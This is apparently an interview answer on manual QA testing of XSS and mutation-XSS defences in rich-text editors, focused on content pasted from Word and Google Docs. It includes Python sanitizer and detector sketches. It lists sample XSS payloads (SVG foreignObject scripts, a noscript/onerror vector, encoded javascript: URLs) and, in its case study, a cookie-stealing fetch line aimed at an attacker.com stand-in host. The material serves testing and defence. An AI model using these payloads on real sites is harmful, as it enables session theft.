Manual Testing (IT) / Manual QA Engineer

Design a comprehensive manual testing methodology to validate **XSS** prevention and structural integrity when users paste content from **Microsoft Word** and **Google Docs** into a browser-based rich text editor, specifically targeting **SVG**-based script injection and **mXSS** vectors that mutate during browser parsing.


Answer to the question

History: Rich text editors (RTEs) are ubiquitous in content management systems, yet they represent a critical attack surface. When users copy content from Microsoft Word or Google Docs, the clipboard contains rich HTML with proprietary metadata, inline styles, and potentially malicious payloads hidden in SVG tags or CSS expressions. The core problem is that naive sanitization might strip visible formatting while missing executable scripts, or conversely, over-sanitize and destroy legitimate semantic structures like complex tables. A systematic manual testing methodology must verify both security (no XSS) and fidelity (preserved structure).

Solution: Implement a three-phase clipboard assault protocol:

  1. Vector Preparation: Curate a library of paste payloads including SVG with an embedded <foreignObject> containing scripts, the legacy-IE CSS binding behavior: url(#default#VML), HTML entity-encoded javascript: protocols, and malformed HTML5 tags designed to exploit browser parser quirks (e.g., <noscript><img src=x onerror=alert(1)></noscript>).

  2. Cross-Engine Paste Simulation: Perform actual copy-paste operations (not typing) from Word (with tracked changes, comments, and embedded Excel objects), Google Docs (with suggested edits and embedded drawings), and raw HTML copied from Browser DevTools. Test in Chrome, Safari, Firefox, and Edge separately, as each handles clipboard MIME types (text/html vs application/rtf) differently.

  3. State Verification: After paste, inspect the DOM via DevTools to confirm that on* event handlers, javascript: URLs, and <script> tags are absent, while verifying that semantic elements (<thead>, <colgroup>, nested lists) remain intact. Then save the content, reload the page, and check the serialized HTML again to detect mutation XSS where the browser parser resurrects scripts during re-rendering.
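The phase-1 vector library can be maintained as data so that every paste test checks the rendered DOM against the same expectations. A minimal sketch in Python (payload IDs, vectors, and the `forbidden_markers` helper are illustrative, drawn from the categories above; the `rendered_html` string would be copied from DevTools after each paste):

```python
from html import unescape

# Hypothetical payload catalogue for phase 1; each entry pairs a paste
# vector with markers that must NOT survive sanitization.
PASTE_PAYLOADS = [
    {
        "id": "svg-foreignobject-script",
        "html": '<svg><foreignObject><script>alert(1)</script></foreignObject></svg>',
        "expect_blocked": ["<script"],
    },
    {
        "id": "legacy-ie-vml-behavior",
        "html": '<div style="behavior: url(#default#VML)">x</div>',
        "expect_blocked": ["behavior"],
    },
    {
        "id": "entity-encoded-js-protocol",
        "html": '<a href="&#106;avascript:alert(1)">link</a>',
        "expect_blocked": ["javascript:"],
    },
    {
        "id": "noscript-parser-quirk",
        "html": '<noscript><img src=x onerror=alert(1)></noscript>',
        "expect_blocked": ["onerror"],
    },
]

def forbidden_markers(rendered_html: str, payload: dict) -> list:
    """Return any forbidden markers that survived sanitization.

    Entity-decodes first so &#106;avascript: style evasions are caught.
    """
    decoded = unescape(rendered_html).lower()
    return [m for m in payload["expect_blocked"] if m.lower() in decoded]
```

During phase 3, a tester pastes each payload, copies the resulting innerHTML from DevTools, and runs it through `forbidden_markers`; any non-empty result is a finding.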

Situation from life

Problem: A legal tech startup developed a contract review application using TinyMCE where attorneys pasted clauses from Microsoft Word. A security audit revealed that contracts containing vendor logos (in SVG format) were executing arbitrary JavaScript when viewed in the reviewer's dashboard. The SVG files contained <script>fetch('https://attacker.com?cookie='+document.cookie)</script> inside <foreignObject> tags. The editor displayed them as harmless images, but the raw HTML stored in the PostgreSQL database executed when rendered in the read-only view, which used dangerouslySetInnerHTML in React without secondary sanitization.

Solutions considered:

Solution A: Strip all HTML and convert to plain text. Pros: Absolute security guarantee; no XSS possible. Cons: Attorneys lost critical formatting like indentation for contract sub-clauses, colored highlighting for risk assessment, and table structures for fee schedules. This rendered the application unusable for legal workflows, causing immediate user rejection.

Solution B: Rely solely on client-side DOMPurify with a permissive configuration. Pros: Preserves user experience and formatting; easy to implement. Cons: Client-side sanitization can be bypassed by directly calling the REST API with malicious payloads, bypassing the editor entirely. Additionally, DOMPurify's default settings allow SVG tags and data-attributes that execute in specific Android WebView versions.

Solution C: Implement defense-in-depth with aggressive client-side cleaning for immediate feedback, combined with server-side sanitization using the OWASP Java HTML Sanitizer with a strict policy allowing only structural tags. Pros: Catches bypass attempts at the API level; allows necessary legal formatting while neutralizing scripts. Cons: Requires maintaining two policy configurations (frontend and backend); risk of performance degradation when processing 100+ page contracts; potential for divergence between what the editor previews and what the server stores if the two policies drift apart.
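The "strict policy allowing only structural tags" in Solution C can be illustrated with a minimal allowlist sanitizer. This is a sketch only, built on Python's stdlib HTMLParser to show the policy shape (drop all attributes, drop script/style/svg subtrees, allow a fixed tag set); a production system would use a maintained library such as the OWASP Java HTML Sanitizer named above:

```python
from html.parser import HTMLParser
from html import escape

# Assumed policy: structural tags only, all attributes dropped.
ALLOWED_TAGS = {"p", "b", "i", "u", "ul", "ol", "li", "table", "thead",
                "tbody", "tr", "td", "th", "colgroup", "col"}
DROPPED_SUBTREES = ("script", "style", "svg")

class StrictSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped subtree

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_SUBTREES:
            self.skip_depth += 1
        elif self.skip_depth == 0 and tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes dropped entirely

    def handle_endtag(self, tag):
        if tag in DROPPED_SUBTREES:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif self.skip_depth == 0 and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(escape(data))  # re-escape text content

def sanitize(html_in: str) -> str:
    s = StrictSanitizer()
    s.feed(html_in)
    s.close()
    return "".join(s.out)
```

Note that the policy is deny-by-default: an unknown tag is silently dropped rather than escaped, and table structure survives because its tags are explicitly allowlisted.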

Chosen solution: We selected Solution C and added a manual QA checkpoint specifically for paste operations. The QA team created a "Malicious Clipboard Suite" containing 75+ CSP bypass vectors, including SVG animations and MathML containers. They discovered that DOMPurify's ALLOWED_URI_REGEXP was permitting javascript: URLs encoded with HTML entities. They configured the sanitizer to flatten all SVG to static <img> tags with Base64 encoding, stripping all interactive elements.
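The SVG-flattening step described above could be sketched as follows. This is a hypothetical helper, not the team's actual code: regex-based stripping is a rough approximation of removing interactive SVG elements, and assumes reasonably well-formed markup; a real implementation would parse the SVG properly:

```python
import base64
import re

# Illustrative patterns: drop scriptable/animated subtrees and on* handlers.
_INTERACTIVE = re.compile(
    r"<\s*(script|foreignObject|animate|set|handler)\b.*?</\s*\1\s*>",
    re.IGNORECASE | re.DOTALL,
)
_EVENT_ATTRS = re.compile(r'\son\w+\s*=\s*(".*?"|\'.*?\'|\S+)', re.IGNORECASE)

def flatten_svg(svg_markup: str) -> str:
    """Strip interactive elements, then embed the SVG as a static base64 <img>."""
    cleaned = _INTERACTIVE.sub("", svg_markup)
    cleaned = _EVENT_ATTRS.sub("", cleaned)
    b64 = base64.b64encode(cleaned.encode("utf-8")).decode("ascii")
    return f'<img src="data:image/svg+xml;base64,{b64}" alt="embedded graphic">'
```

Serving the SVG through an <img> element is itself a mitigation, since browsers do not execute scripts in image-loaded SVG; stripping interactive elements before encoding adds defense-in-depth in case the markup is ever re-inlined.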

Result: The vulnerability was patched before production release. The methodology caught two additional mXSS vectors involving HTML comments that mutated into executable scripts in Safari's reader mode. The legal team retained full formatting capabilities, and subsequent penetration testing found no injection vectors in the paste pipeline.

What candidates often miss

How do you detect mutation XSS (mXSS) where the browser's parser modifies the sanitized string after insertion, re-creating executable scripts?

Many candidates inspect the HTML immediately after paste using the editor's "source view" or DevTools. However, mXSS exploits occur when the sanitized string is assigned to innerHTML, the browser parses it, and the resulting DOM differs from the original string due to parser normalization (e.g., <noscript><img title="--><script>... mutations). The correct approach is to perform a round-trip test: serialize the DOM back to a string using element.innerHTML after insertion, then compare it against the expected sanitized output. If new <script> tags or event handlers appear after this serialization, the sanitizer is vulnerable. Additionally, test specifically in IE11 if supported, as its parser behavior for malformed tables differs significantly from Blink or Gecko.
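The round-trip comparison lends itself to a small harness. In this sketch (function and variable names are illustrative), `sanitized` is the sanitizer's output and `browser_serialized` is the string a tester copies from the browser console after assigning to innerHTML; the harness only flags dangerous constructs that appear after the browser round-trip but were absent before, which is the signature of mXSS:

```python
import re

# Dangerous-construct detectors for the post-insertion serialization.
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)
EVENT_RE = re.compile(r"\son\w+\s*=", re.IGNORECASE)
JS_URL_RE = re.compile(r"javascript\s*:", re.IGNORECASE)

def mxss_regressions(sanitized: str, browser_serialized: str) -> list:
    """Flag constructs present after the browser round-trip but absent
    from the sanitizer's output, i.e. resurrected by parser mutation."""
    findings = []
    for name, rx in (("script tag", SCRIPT_RE),
                     ("event handler", EVENT_RE),
                     ("javascript: URL", JS_URL_RE)):
        if rx.search(browser_serialized) and not rx.search(sanitized):
            findings.append(name)
    return findings
```

The comparison deliberately runs on the serialized strings rather than on live DOM nodes, because the mutation happens inside the browser's parser; only the browser itself can produce the post-insertion serialization, so this harness documents the verdict rather than replacing the manual DevTools step.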

Why might content paste correctly and safely in the editor, but fail security validation when the same content is later loaded into a read-only React view via dangerouslySetInnerHTML?

Candidates often miss "contextual sanitization drift." Rich text editors sanitize for the editing context, but the viewing context might use different React versions, Content Security Policy headers, or additional JavaScript libraries that re-parse the content. The answer is that you must verify the stored content through the entire lifecycle: paste → save to API → retrieve from API → render in read-only view. Specifically, check for double-encoding issues where &lt; becomes &amp;lt; during database storage, or Unicode normalization differences between the editor's UTF-8 handling and the database's collation. Test with payloads containing smart quotes (curly quotes) and em-dashes, which Word auto-substitutes, to ensure the database's utf8mb4 configuration doesn't truncate multi-byte characters, potentially breaking sanitization boundaries and allowing script injection.
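Double-encoding drift in the lifecycle check above can be measured mechanically. A sketch (the `encoding_depth` helper is illustrative): repeatedly entity-decode the retrieved content and count how many rounds change it; depth 1 is normal for escaped content, while depth 2 or more on content retrieved from the API suggests an extra encoding pass was added somewhere between save and render:

```python
from html import unescape

def encoding_depth(stored: str, max_depth: int = 5) -> int:
    """Count how many rounds of HTML entity decoding change the string.

    Depth > 1 on retrieved content suggests double-encoding drift
    (e.g. &lt; was stored as &amp;lt;).
    """
    depth, current = 0, stored
    for _ in range(max_depth):
        decoded = unescape(current)
        if decoded == current:
            break
        depth += 1
        current = decoded
    return depth
```

Running this at each lifecycle stage (post-paste, post-save, post-retrieve) localizes exactly which hop introduced the extra encoding.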

How would you manually validate sanitization behavior when the application uses a Markdown-based editor (like CKEditor 5 with Markdown output) rather than raw HTML storage?

This tests understanding of format conversion risks. When editors convert HTML to Markdown (e.g., via Turndown), malicious payloads can hide in HTML attributes that have no Markdown equivalent, potentially being stripped incompletely or converted into link references that execute on click. The correct methodology involves: (1) Pasting the malicious HTML into the editor, (2) Switching to Markdown source view to verify that dangerous attributes are gone (not just visually hidden), (3) Converting back to HTML (if supported) to ensure the round-trip doesn't resurrect scripts, and (4) Checking that Markdown link syntax [text](javascript:alert(1)) is explicitly blocked by the parser's link validation regex, not just the renderer. Additionally, verify that HTML comments <!-- --> (which can break Markdown parsers) are stripped to prevent leakage of sensitive server-side data.
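Step 4's link-scheme check can be sketched as a standalone validator. This is an illustrative helper, not any particular Markdown parser's actual validation: it extracts Markdown link targets, normalizes entity- and percent-encoding first (so encoded evasions are caught), then rejects dangerous schemes; whether data: is blocked is a policy choice, assumed strict here:

```python
import re
import urllib.parse
from html import unescape

# Naive Markdown inline-link matcher: [text](target ...)
MD_LINK = re.compile(r"\[([^\]]*)\]\(\s*([^)\s]+)")
BLOCKED_SCHEMES = ("javascript", "data", "vbscript")  # assumed strict policy

def unsafe_md_links(markdown_text: str) -> list:
    """Return link targets whose scheme resolves to a blocked protocol,
    including entity- or percent-encoded variants."""
    bad = []
    for m in MD_LINK.finditer(markdown_text):
        # Decode entities and percent-encoding before scheme inspection.
        url = urllib.parse.unquote(unescape(m.group(2))).strip().lower()
        if url.split(":", 1)[0] in BLOCKED_SCHEMES:
            bad.append(m.group(2))
    return bad
```

The decode-before-inspect order is the point of the sketch: checking the raw target string would miss javascript: hidden behind %6A or &#106; style encoding.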